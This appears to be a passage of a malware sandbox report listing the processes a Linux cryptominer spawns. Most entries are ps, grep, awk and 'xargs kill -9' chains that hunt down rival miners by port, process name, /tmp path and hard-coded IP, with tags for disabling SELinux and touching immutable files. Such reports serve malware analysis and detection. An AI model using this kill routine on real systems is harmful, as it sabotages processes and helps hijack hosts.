- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:972
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:971
- /bin/grep
  grep :5555
  2⤵
  PID:970
- /bin/grep
  grep -v -
  2⤵
  PID:973
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:974
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:979
- /bin/grep
  grep :6666
  2⤵
  PID:978
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:980
- /bin/grep
  grep -v -
  2⤵
  PID:981
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:982
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:988
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:987
- /bin/grep
  grep :6665
  2⤵
  PID:986
- /bin/grep
  grep -v -
  2⤵
  PID:989
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:990
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:995
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:994
- /bin/grep
  grep :6667
  2⤵
  PID:993
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:997
- /bin/grep
  grep -v -
  2⤵
  PID:996
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1001
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1000
- /bin/grep
  grep :7777
  2⤵
  PID:999
- /bin/grep
  grep -v -
  2⤵
  PID:1002
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1003
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1009
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1008
- /bin/grep
  grep :8444
  2⤵
  PID:1007
- /bin/grep
  grep -v -
  2⤵
  PID:1010
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1011
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1015
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1014
- /bin/grep
  grep :3347
  2⤵
  PID:1013
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1017
- /bin/grep
  grep -v -
  2⤵
  PID:1016
- /bin/grep
  grep :10008
  2⤵
  PID:1021
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1023
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1022
- /bin/grep
  grep -v -
  2⤵
  PID:1024
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1025
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1030
- /bin/grep
  grep :13531
  2⤵
  PID:1029
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1031
- /bin/grep
  grep -v grep
  2⤵
  PID:1028
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1035
- /bin/grep
  grep :3333
  2⤵
  PID:1034
- /bin/grep
  grep -v grep
  2⤵
  PID:1033
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1036
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1032
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1041
- /bin/grep
  grep :5555
  2⤵
  PID:1040
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1042
- /bin/grep
  grep -v grep
  2⤵
  PID:1039
- /bin/ps
  ps aux
  2⤵
  PID:1038
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1046
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1045
- /bin/grep
  grep -v grep
  2⤵
  PID:1044
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1047
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1043
- /bin/grep
  grep log_
  2⤵
  PID:1051
- /bin/grep
  grep -v grep
  2⤵
  PID:1050
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1052
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1049
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1053
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1058
- /bin/grep
  grep -v grep
  2⤵
  PID:1055
- /bin/grep
  grep systemten
  2⤵
  PID:1056
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1054
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1057
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1062
- /bin/grep
  grep netns
  2⤵
  PID:1061
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1063
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1064
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1064
- - /usr/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1064
- - /usr/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1064
- - /sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1064
- - /bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1064
- /bin/grep
  grep -v grep
  2⤵
  PID:1060
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1059
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1068
- /bin/grep
  grep voltuned
  2⤵
  PID:1067
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1069
- /bin/grep
  grep -v grep
  2⤵
  PID:1066
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1065
- /bin/grep
  grep darwin
  2⤵
  PID:1072
- /bin/grep
  grep -v grep
  2⤵
  PID:1071
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1073
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1074
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1070
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1078
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1077
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Reads runtime system information
  PID:1079
- /bin/grep
  grep -v grep
  2⤵
  PID:1076
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1075
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1084
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1083
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1082
- /bin/grep
  grep -v grep
  2⤵
  PID:1081
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1080
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1088
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1087
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1089
- /bin/grep
  grep -v grep
  2⤵
  PID:1086
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1085
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1093
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1092
- /bin/grep
  grep -v grep
  2⤵
  PID:1091
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1094
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1090
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1098
- /bin/grep
  grep -v grep
  2⤵
  PID:1096
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1099
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1097
- /bin/ps
  ps aux
  2⤵
  PID:1095
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1103
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1102
- /bin/grep
  grep -v grep
  2⤵
  PID:1101
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1104
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1100
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1108
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1107
- /bin/grep
  grep -v grep
  2⤵
  PID:1106
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1109
- /bin/ps
  ps aux
  2⤵
  PID:1105
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1113
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1112
- /bin/grep
  grep -v grep
  2⤵
  PID:1111
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1114
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1110
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1117
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1118
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1119
- /bin/grep
  grep -v grep
  2⤵
  PID:1116
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1115
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1122
- /bin/grep
  grep -v grep
  2⤵
  PID:1121
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1123
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1124
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1120
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1128
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1127
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1129
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1125
- /bin/grep
  grep -v grep
  2⤵
  PID:1126
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1133
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1132
- /bin/grep
  grep -v grep
  2⤵
  PID:1131
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1134
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1130
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1138
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1137
- /bin/grep
  grep -v grep
  2⤵
  PID:1136
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1139
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1135
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1143
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1142
- /bin/grep
  grep -v grep
  2⤵
  PID:1141
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1140
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1144
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1148
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1147
- /bin/grep
  grep -v grep
  2⤵
  PID:1146
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1149
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1145
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1153
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1152
- /bin/grep
  grep -v grep
  2⤵
  PID:1151
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1154
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1150
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1157
- /bin/grep
  grep -v grep
  2⤵
  PID:1156
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1158
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1155
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1159
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1162
- /bin/grep
  grep -v grep
  2⤵
  PID:1161
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1163
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1164
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1160
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1168
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1167
- /bin/grep
  grep -v grep
  2⤵
  PID:1166
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1169
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1165
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1173
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1172
- /bin/grep
  grep -v grep
  2⤵
  PID:1171
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1174
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1170
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1177
- /bin/grep
  grep -v grep
  2⤵
  PID:1176
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1179
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1178
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1175
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1185
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1184
- /bin/grep
  grep -v grep
  2⤵
  PID:1183
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1186
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1182
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1191
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1190
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1192
- /bin/grep
  grep -v grep
  2⤵
  PID:1189
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1188
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1197
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1196
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1198
- /bin/grep
  grep -v grep
  2⤵
  PID:1195
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1194
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1204
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1203
- /bin/grep
  grep -v grep
  2⤵
  PID:1202
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1205
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1201
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1209
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1210
- /bin/grep
  grep -v grep
  2⤵
  PID:1208
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1211
- /bin/ps
  ps aux
  2⤵
  PID:1207
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1216
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1215
- /bin/grep
  grep -v grep
  2⤵
  PID:1214
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1217
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1213
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1223
- /bin/grep
  grep HiPxCJRS
  2⤵
  - System Network Configuration Discovery
  PID:1222
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1224
- /bin/grep
  grep -v grep
  2⤵
  PID:1221
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1220
- /bin/grep
  grep -v grep
  2⤵
  PID:1228
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1227
- /bin/grep
  grep http_0xCC030
  2⤵
  - Disables SELinux
  PID:1229
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1230
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1231
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1235
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1234
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1236
- /bin/grep
  grep -v grep
  2⤵
  PID:1233
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1232
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1242
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1241
- /bin/grep
  grep -v grep
  2⤵
  PID:1240
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1243
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1239
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1249
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1248
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1250
- /bin/grep
  grep -v grep
  2⤵
  PID:1247
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1246
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1254
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1253
- /bin/grep
  grep -v grep
  2⤵
  PID:1252
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1255
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1251
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1261
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:1260
- /bin/grep
  grep -v grep
  2⤵
  PID:1259
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1262
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1268
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1267
- /bin/grep
  grep -v grep
  2⤵
  PID:1266
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1265
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1271
- /bin/grep
  grep -v grep
  2⤵
  PID:1270
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1273
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1269
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1272
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1279
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1278
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1280
- /bin/grep
  grep -v grep
  2⤵
  PID:1277
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1276
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1286
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1285
- /bin/grep
  grep -v grep
  2⤵
  PID:1284
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1287
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1283
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1293
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1292
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1291
- /bin/grep
  grep -v grep
  2⤵
  PID:1290
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1289
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1297
- /bin/grep
  grep -v grep
  2⤵
  PID:1296
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1298
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1299
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1295
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1305
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1304
- /bin/grep
  grep -v grep
  2⤵
  PID:1303
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1306
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1302
- /bin/grep
  grep "]"
  2⤵
  PID:1311
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1312
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1308
- /bin/grep
  grep -v grep
  2⤵
  PID:1309
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1313
- /bin/grep
  grep -v aux
  2⤵
  PID:1310
- /bin/grep
  grep -v grep
  2⤵
  PID:1316
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1317
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1318
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1315
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1319
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1323
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1322
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1324
- /bin/grep
  grep -v grep
  2⤵
  PID:1321
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1320
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1327
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1328
- /bin/grep
  grep -v grep
  2⤵
  PID:1326
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1329
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1325
- /bin/grep
  grep -v -
  2⤵
  PID:1333
- /bin/grep
  grep -v /
  2⤵
  PID:1332
- /bin/grep
  grep -v _
  2⤵
  PID:1334
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1335
- /bin/grep
  grep -v grep
  2⤵
  PID:1331
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1336
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1330
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1339
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1340
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1341
- /bin/grep
  grep -v grep
  2⤵
  PID:1338
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1337
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1346
- /bin/grep
  grep rsync
  2⤵
  PID:1345
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1347
- /bin/grep
  grep -v grep
  2⤵
  PID:1344
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1343
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1351
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1352
- /bin/grep
  grep watchd0g
  2⤵
  PID:1350
- /bin/grep
  grep -v grep
  2⤵
  PID:1349
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1348
- /bin/grep
  grep -v grep
  2⤵
  PID:1354
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1353
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1355
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1356
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1357
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1355
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1355
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1355
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1355
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1355
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1355
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  - Reads runtime system information
  PID:1361
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  - Disables SELinux
  PID:1360
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1362
- /bin/grep
  grep -v grep
  2⤵
  PID:1359
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1358
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1365
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1366
- /bin/grep
  grep -v grep
  2⤵
  PID:1364
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1367
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1363
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1371
- /bin/grep
  grep gitee.com
  2⤵
  PID:1370
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1372
- /bin/grep
  grep -v grep
  2⤵
  PID:1369
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1368
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1376
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1377
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1375
- /bin/grep
  grep -v grep
  2⤵
  PID:1374
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1373
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1381
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1380
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1382
- /bin/grep
  grep -v grep
  2⤵
  PID:1379
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1378
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1386
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1387
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1385
- /bin/grep
  grep -v grep
  2⤵
  PID:1384
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1383
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1390
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1391
- /bin/grep
  grep -v grep
  2⤵
  PID:1389
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1392
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1388
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1396
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1397
- /bin/grep
  grep kthrotlds
